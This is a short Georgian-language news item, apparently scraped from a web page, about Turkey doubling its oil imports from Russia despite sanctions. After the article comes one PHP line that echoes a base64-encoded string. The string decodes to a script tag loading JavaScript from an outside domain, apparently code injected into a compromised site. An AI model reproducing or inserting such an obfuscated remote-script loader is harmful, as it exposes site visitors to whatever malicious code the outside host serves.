celsiusi
ავერსი შნაიდერი
თურქეთმა რუსეთის წინააღმდეგ დაწესებული სანქციების ფონზე, მიმდინარე წელს რუსეთიდან ნავთობის იმპორტი გააორმაგა.
 
ინფორმაციას სააგენტო „როიტერი“ ავრცელებს.
 
როგორც მედია წერს, თურქეთსა და რუსეთს შორის ვაჭრობა განსაკუთრებით აქტიური გახდა გაზაფხულის შემდეგ. ამასთან, მედიის ცნობით, Refinitiv-ის მონაცემებით, თურქეთმა რუსეთიდან ნავთობის იმპორტი დღეში 200 ათასი ბარელით გაზარდა, მაშინ, როცა ერთი წლის წინ, ანალოგიურ პერიოდში 98 ათასს შეადგენდა.
 
შეგახსენებთ, თურქეთმა რუსეთს უკრაინაში შეჭრის გამო სანქციები არ დაუწესა, რადგან ანკარა კვლავ დამოკიდებულია რუსულ ენერგორესურსებზე.
 
თურქეთისა და რუსეთის პრეზიდენტები ერთმანეთს აგვისტოს დასაწყისში შეხვდნენ და განაცხადეს ორმხრივი ურთიერთობის გაღრმავების შესახებ, განსაკუთრებით ეკონომიკურ სფეროში.
513
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");